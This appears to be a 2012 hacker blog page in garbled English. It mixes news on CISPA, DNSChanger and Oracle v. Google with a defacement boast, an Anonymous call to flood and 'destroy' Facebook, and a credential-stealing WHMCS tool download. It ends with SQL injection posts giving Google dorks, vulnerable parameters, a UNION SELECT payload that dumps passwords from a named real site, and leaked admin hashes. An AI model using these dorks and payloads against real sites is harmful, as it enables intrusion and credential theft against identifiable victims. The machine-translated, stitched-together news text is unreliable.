Jumat, 27 April 2012

Protest About Cyber Intelligence Sharing and Protection Act (CISPA)

Protest About Cyber Intelligence Sharing and Protection Act (CISPA)


The Electronic Frontier Foundation (EFF) and Reporters Without Borders were among organizations that signaled the start of a week of Internet protests against the Cyber Intelligence Sharing and Protection Act  ( CISPA ).
"A blanket monitoring system is never an appropriate solution," Reporters Without Borders said in a release calling for Congress to reject the CISPA legislation introduced in November of last year.
"Freedom of expression and the protection of online privacy are increasingly under threat in democratic countries, where a series of bills and draft laws is sacrificing them in the interests of national security or copyright."


The EFF released an online tool for US residents to find Twitter accounts of their representatives in Congress to target messages about the threat CISPA poses to privacy in day-to-day lives.
"CIPSA would allow ISPs, social networking sites, and anyone else handling Internet communications to monitor users and pass information to the government without any judicial oversight," said EFF activism director Rainey Reitman.
"The language of this bill is dangerously vague, so that personal online activity -- from the mundane to the intimate -- could be implicated."
The Twitter portion of the online campaign included creating #CongressTMI (an acronym for Too Much Information) and #CISPA "hashtags" to be added to messages to make it easier to find "tweets" about the topic.
Organizations plan to augment the online campaign with old-fashioned ink-and-paper letters sent to legislators by post and articles detailing reasoning behind opposing the bill.
"We need cybersecurity legislation, not surveillance legislation," said Center for Democracy and Technology president Leslie Harris.
Groups involved in the protest include Constitution Project; Fight for the Future, and the American Civil Liberties Union.
"Some people believe that we have to sacrifice civil liberties in order to shore up cybersecurity, but that's misunderstanding both issues," said EFF Senior Staff Attorney Lee Tien.
"Giving companies carte blanche to bypass federal law does not make us safer -- it puts us at more risk."

Kamis, 26 April 2012

SOPA Change Name To CISPA ( Cyber Intelligence Sharing and Protect Act )

SOPA Change Name To CISPA ( Cyber Intelligence Sharing and Protect Act )

 



The Cyber Intelligence Sharing and Protection Act (CISPA) is a United States proposed law introduced on November 30, 2011 by U.S. Representative Michael Rogers (R-MI) and 111 co-sponsors. It was passed in the House of Representatives on April 26, 2012. Prior to the amendments offered during final passage of the bill that would address many Adminstration concerns, President Obama threatened to veto the bill.

Cyber Intelligence Sharing and Protect Act (CISPA) is a U.S. Senate bill designed to allow more sharing of “cyber threat intelligence” between the U.S. government and private sectors. If passed, the bill would allow the government with additional powers and resources to monitor the online activities of U.S. citizens to prevent cybercrimes, namely trafficking in intellectual property and counterfeit goods. While it was proposed as an amendment to the National Security Act of 1947, the bill has been widely viewed as a companion bill to the SOPA and PIPA.


If the bill is passed by the U.S. Congress, Internet companies and websites would be required to collect private information of their users and pass them onto the government upon request. Despite the popular comparison between CISPA and its unsuccessful precedents SOPA and PIPA, the new bill would reward companies for collecting data, intercepting or modifying communications and passing information over to the government. According to the official press release, the bill has gained support from several Internet giants like AT&T, Verizon and Facebook.

Anonymous Create Music Social Network

Anonymous Create Music Social Network

A small group of programmers who claimed to be part of the hacker group Anonymous, created a new music social networking Anontune named. This project developed since February 23, 2012.

They told the Wired site, Anontune created to provide a service that can play music on the internet with the smooth. The songs are played in streaming diagregat from third party sources, such as YouTube and SoundCloud.

The songs will be included in the playlist Anontune account, and can be distributed to other users.

Until now, the site is located at www.anontune.com Anontune new process is 20% (still in beta). Anonymous social networking hope this music can be completed, as they claim, Anontune will improve the way a person involved in the music.

Check out the video announcement Anonymous on Anontune below.
 

FBI will block 35 thousand Internet World

 FBI will block 35 thousand Internet service throughout on the world

 


Beureu Federal Investigation ( FBI ) will block 35 thousand internet service throughout the world. Media ZeeNews announce on Wednesday ( 25/4 ), personal computers worldwide will be closed after being infected with Trojan virus. The virus is invisible and not detected in the 80 000 computers in the United States and another 20,000 in the UK.

Computer viruses are called "DNSChanger" send Internet users to unwanted websites and illegal. The virus also prevents users from visiting infected websites that can help them safely get rid of computer problems.

FBI announces, "Internet blackout" will take place July 9. After the FBI warning, the number of virus infected computers decreased. Most of the personal computer, not the company.

FBI to detect the infection some time ago. They have set up a temporary server to keep non-infected computer to be able to work. While the server was created to allow the company to remove the worm from an infected server. As a result, their computer will be affected by 120 days to get rid of malware

Selasa, 24 April 2012

HostGator TURKEY Hacked by Dual Attacker Vicky-Cyber With Om Jin

HostGator TURKEY  Hacked by Dual Attacker


who knows what they want from the site HostGator TURKEY.
after the down for a long time, Now Dual attacker who uses the name of their underground as vicky-cyber and Om jin into action again.

website hosting is now derived from the Turkish state to target them.
turkey hostgator they have managed to penetrate its defenses.

and they left their posts.

"HOSTGARTOR TURKEY ?? ! I KILL YOU"

 

Site victim : http://www.hostgatorturkiye.com/screen/
Mirror :
http://www.hackmirror.com/mirror/5619
http://www.hackmirror.com/mirror/5620

Selasa, 17 April 2012

a message from anonymous to NSA

Message from Anonymous to NSA

 

Here is  Anonymous message that is given to the NSA.
We get the following message from an anonymous site.

NSA Regards,

We are Anonymous.

The fact you are about sabotaj potential future power grid by Anonymous, disgusts us to the terraces, it is clear kerana afraid of the wind business. Anonymous bahawa Idea will close one of the most important sources for it operates, is not absurd.

When the organization of safety and perisikan around the world cubaan to describe Anonymous as 'pertubuhan pengganas', busy people understand this bahawa same subset Without their names talking about, is actually a movement for freedom. It looks intimidating empire organizations, to the point where he can do nothing in an attempt to drop without a name, and make people believe in anonymous form solely for mencederakan innocent people.

Is there a demand and forecasts for the false accusing Anonymous percubaan something that would apply in the future - perhaps even designed by the same organization kingdom which is now blaming Without a name? Busy people have given warnings about the sad state of power grid infrastructure in the past, but why do we close our own computers and other communication tools?

Many thousands of people depend on the electric for everything they do; hospital, although this requires electrically to save lives, and take the power grid would cause harm to people that we all want to protect.

There is no legitimate reason for us to shut down the power grid, as we are aware. Anything by the various royal prophecy, salvation, and percubaan perisikan organizations tend to instill fear to those who do not understand this case, and to impose Anonymous as a whole.

To accompany the mother Tere Last Seconds



Tere singer's mother, Purba Lersiana last breath on Monday (4/16/2012) ago. Tere was a devoted mother to accompany the final seconds.

Singer of 'I Hate Him worth' it would hardly whispered utterances to strengthen the mother. Until finally Lersiana died in her arms.

"Until the last moment will pass away Mama, Tere continue strengthening the mother, to say 'Mama certainly strong, you'd better, if you've recovered we'll walk,'" said sister Tere, Desy Wandiyati at PGI Hospital Funeral Home Cikini, Central Jakarta, Tuesday (17/04/2012).

Desy explained, the mother had been sick a long time. Disease is menggeorgoti Lersiana body since he was paralyzed in a car crash in 1989.

In addition, Desy also explained that before buried in TPU driver of the Land will be made for the funeral ceremonies.

"Not made ​​in procession Batak events, meetings Martonggoraja family before departure to be buried tomorrow in TPU driver of the Land," he said.

XPontus XML files Editor and XPATH

XPontus XML Files Editor and XPATH

 




For starters you’ll find a Pretty Print option in the Tools menu that will take the XML file and add line breaks and tabs in the appropriate places so that it’s a lot easier on your eyes. You know how awesome that is if you’ve ever dealt with a semi-compressed XML file that has all the data on one computer-friendly line. That along with the tree-view displayed on the left-side of the window should help you find what you’re looking for in the file.

Trying to read or modify large XML files can be a rather tedious job, but with the right tools it can obviously be a lot easier. The cross-platform Java-based XPontus XML Editor is free, and has the right features that make parsing an extensive XML file a breeze.

arrow Windows Windows; Mac Mac; Linux Linux arrow

The true nerds can take things to another step and use XPATH expressions to navigate the XML file. This also doubles as a great way to test out any XPATH expressions you want to implement in your code to ensure they work as expected. When you roll up all of these features into one package you get Xpontus, which ends up being a great choice for both basic and advanced users that have to work with XML files.

XPontus XML  Files Editor

Fraud committed by service providers VPN

this time I will write an article about the fraud done by the hosting to customers.

on wakt I order a Virtual Private Server ( VPS ) that promises low prices. This is the promo of the service provider:

"Here is one special discounted VPS requiring annual payment, sent to me a few days ago from Dustin at SemoWeb. You can sign up to this offer sign up via this link. For $ 21/Year it Gives you

     256MB of burstable memory guaranteed/512MB
     10GB of storage
     350GB/month data transfer
     OpenVZ / SolusVM

It is a
package similar to this one we posted two weeks ago, except a bit less monthly data. Servers with HostDime in Orlando FL oops They are in Dallas TX. The VPS plans on their website are "fully managed", although Dustin did not disclose what is included in the management in the previous post (nor can I found it on their website). Some pages do need to be updated when I search on their website. "


when I have to pay what I found?
My account was deleted by the owner of the hosting.

and the funds that I have not paid in return.

Be careful with this. because it could have happened to me happen to you.

before you decide to order a VPS then you should research it first. Are these VPS providers place a fraud or not.

Oracle Accuses Google Steal The Code For Android

Oracle accuses Google Steal The code for Android

 Oracle VS Google

Oracle Corp proceedings initiated against Google Inc. in federal court in San Francisco, USA. Quoted by Reuters, Oracle sue Google in August 2010 for patent infringement and copyright claims to the Java programming language.
According to Oracle, Google's Android OS Java infringe intellectual obtained when buying Sun Microsystems in 2010. Google says it does not infringe the patent because Oracle does not own the copyright to certain parts of Java. The trial is expected to last about eight weeks.
Oracle attorney, Michael Jacobs says Google takes copyright blueprint Java to harness the creative power of millions of Java software developers. This blueprint can be used to create Android applications. Google has not received appropriate permissions to use this.
Jacobs shows some email from Google to the jury. This evidence is displayed in the gallery of the courtroom on the HD screen. In 2005, Chief of the Division of Android, Andy Rubin sent an e-mail to the founders of Google, Larry Page proposes to take to the Java license.
"We will pay Sun for the license," wrote Rubin.
Based on the e-mail from Rubin to the Co-CEO of Google Eric Schmidt on May 2007, Google refused to take a license.
"I'm through dealing with the Sun (your right). They will not be happy when we release our product," wrote Rubin.
In early cases, the estimated loss on Google violation of U.S. $ 6.1 billion. Oracle claims Google has been narrowed to only two of seven in the first patent. Oracle seeking damages of copyright about $ 1 billion.
Oracle CEO, Larry Ellison will be the first witness designated Oracle. Ellison will testify about the importance of Java to Oracle's business and that has caused losses to the company's Android.
From the Google founders Larry Page will explain the details about Google's business plan and marketing strategy for Android, including the company's acquisition of Motorola.

Senin, 16 April 2012

Facebook Has Been Attacking Anonymous Accounts

Facebook Has Been Attacking Anonymous Accounts

Facebook has been attacking anonymous accounts, and deleting them for not containing actual personal info.

This has made no real dent in our movement.
It is pathetic that they think they can stop us.

We are an idea and you can not stop a idea!

WE WILL CONTINUE TO GROW AS LONG AS THE PEOPLE OF THE WORLD ARE BEING OPRESSED, 
THAT VERY OPPRESSION IS WHAT MAKES PEOPLE ANONYMOUS IN THE FIRST PLACE!

We will not tolerate this attack on our right to be anonymous.

This Oppression will not go unnoticed.

They have angered the hive mind and we decided it is time to strike back.

Operation Face Flood NOW initiated.
Operation Delete Facebook NOW initiated.
Operation Kill Facebook NOW initiated.


We have grown to an inconceivable number of people from all over the world, and it is breathtaking how the number of anonymous increases every day.

Anybody can participate in this online protest, hacking skills are not required.

Operation Face Flood is a legal resistance.

Even those who can not hack or do not want to risk denial of service attacks can join.
They will be facing something much larger than just the fearless hackers they are used to,

May 1st to THE END we will all make our presence known,

To those of you who are new, or unable to hack for what ever reason,

As all anonymous will take part in the protest, you might make up a second Facebook account.

Borrow a phone from a stranger to have your confirmation code sent to.

Spend your FREE time uploading this video in download link as often as you can.

Its nothing but a waving anonymous flag at a decent size, http://www.mediafire.com/?y22asas1k1olh9h



This will overflow their database with blocks of unusable data,

WE MUST DO THIS as one hive!

Spam the mass Facebook accounts with your thoughts!

LET THE PEOPLE KNOW WHAT ANONYMOUS IS,

WAKE PEOPLE UP AND MORE WILL JOIN US,

THIS WILL TURBO BOOST THE RATE THAT ANONYMOUS IS GROWING,


WE SPREAD LIKE A LIVING VIRUS INTELLIGENT AND RUTHLESS.

We are powerful together, so let us try to overfill their data servers ON MAY FIRST AND EVERY DAY AFTER!



MAKE YOUR OWN VIDEOS OF BLACK SCREENS TO UPLOAD.

This will take all of us on a long campaign.

Inform and invite all of your friends!

EXPLAIN TO THE THE IMPORTANCE OF THIS REVOLUTION,

PEOPLE HAVE WANTED IT FOR SO LONG BUT SOME DO NOT KNOW ITS HERE!

This data flood will last until the end of facebook.

During this time ALL OUR ELITE hackers will do all they can to break and destroy Facebook.


It is time for Facebook to stop abusing us for data collection and spying on the people!

WE DEMAND THAT FACEBOOK CHANGES THERE PRIVACY POLICIES,
STOPS DELETING ACCOUNTS FOR BEING ANONYMOUS,
EVERY ONE YOU DELETE WE WILL MAKE TWO MORE!

AND MOST OF ALL, STOPS SELLING PERSONAL INFO ABOUT ITS MEMBERS!

IF YOU DO, THEN WE WILL STOP ALL ATTACKS AS WE UNDERSTAND FACEBOOK CAN BE A IMPORTANT SERVICE!



IF YOU DO NOT MEET OUR DEMANDS, Facebook, WE CREATED YOU AND WE WILL DESTROY YOU.


We are a legion
We do not forgive
We do not forget
Facebook, you should have expected us!

Home Office Website Hacked By Anonymous

Home Office Website Hacked By Anonymous

 Home Office tonight was Hacked By Anonymous

Againt's Anonymous protest after its website was taken down in an apparent backlash against Government extradition and surveillance policies.
A group of computer hackers claimed responsibility for what appeared to be a denial of service attack last night, which left users unable to fully access the department's homepage for several hours.
A message on the site said the page was unavailable "due to a high volume of traffic".
One message on Twitter claiming to be from Anonymous, a loosely organised group of hackers, said the action was "for your draconian surveillance proposals", while another said it was in protest at the UK's controversial extradition treaty with America.
It read: "You should not give UK citizens to foreign countries without evidence. If an offence happened in the UK, so should the trial."
Another tweet claiming to be from members said the action had been taken in "protest of the potential extradition of Gary McKinnon, Christopher Harold Tappin & Richard O'Dwyer."
A Home Office spokeswoman said tonight: "The Home Office website was the subject of on online protest last night.
"This is a public facing website and no sensitive information is held on it. There is no indication that the site was hacked and other Home Office systems were not affected.
"Measures put in place to protect the website meant that members of the public were unable to access the site intermittently.

"We will continue to monitor the situation and take measures accordingly."

There were also claims on Twitter Anonymous had disrupted the websites of the Ministry of Justice and Number 10.
One message said: "#Anonymous launched a cyberattack on http://www.number10.gov.uk, http://www.homeoffice.gov.uk & http://www.justice.gov.uk resulting in multiple TANGO DOWNS."

WHMCS Pentesting Tool

WHMCS Pentesting Tool 

 


WHMCS pentesting tool

This is good pentesting tool for the WHMCS sites. This tool will look for the vulnerability in the site and will get the db_username, db_password, db_license, db_host, db_name, cc_enryption_hash, and templates_compiledir from the site .
Easy to use and useful tool :) .
Download this tool :- http://www.4shared.com/file/6ebvAUgy/ProjectX_WHMCS_Pentesting_Tool.html
And don’t forget to share it ;)

 

SantriaCMS SQL Injection Vulnerability

SantriaCMS SQL Injection Vulnerability

 

Dork : "view.php?idArtikel="
Exploit :
http://target.com/cms/view.php?idArtikel=[SQLi]  

adminpage = /login.php

example site :

http://joksus.com

username : admin
password : 21232f297a57a5a743894a0e4a801fc3 => [admin] 

Minggu, 15 April 2012

Dede Cms All Versions Sql Vulnerability Exploit

Dede Cms All Versions Sql Vulnerability Exploit

 

Dorks:  inurl:"id" "DedeCMS Error Warning!"
Vulnerable Files : 
/list.php?id=[sql]
/members.php?id=[sql] 
/book.php?id=[sql] 


Happy Hacking :D 

pGB 2.12 SQL Injection Vulnerability

pGB 2.12 SQL Injection Vulnerability


Dork : inurl:kommentar.php?id=[SQLi]

Example Target : http://www.keindsl.de/kommentar.php?id=15

username: webmaster
password: 688e46d35a3a373c <--- phpBB  :p

Happy Hacking  :D

4PSA CMS SQL Injection Vulnerabilities

4PSA CMS SQL Injection Vulnerabilities

Google Dork: "Communications solution from 4PSA."
p0c : http://target.com/print.php?id=[SQLi]


Example site :

http://www.pchardware.ro/Reviews/print.php?id=NULL%20UNION+SelEct+group_concat%28uname,0x3a,pwd%29,2+FROM%20user--


Best Regard's
Vicky-Cyber 

Joomla component (com_ponygallery) SQL injection Vulnerability

Joomla SQL injection Vulnerability

 

Messege in this Picture "Warning: mysql_num_rows(): supplied argument is not a valid MySQL result resource in /home/mega/public_html/site/components/com_ponygallery/ponygallery.php on line 994"



Google dork: inurl:"com_ponygallery"
[~]Exploit/p0c :http://www.site.com/index.php?option=com_ponygallery&Itemid=[sqli]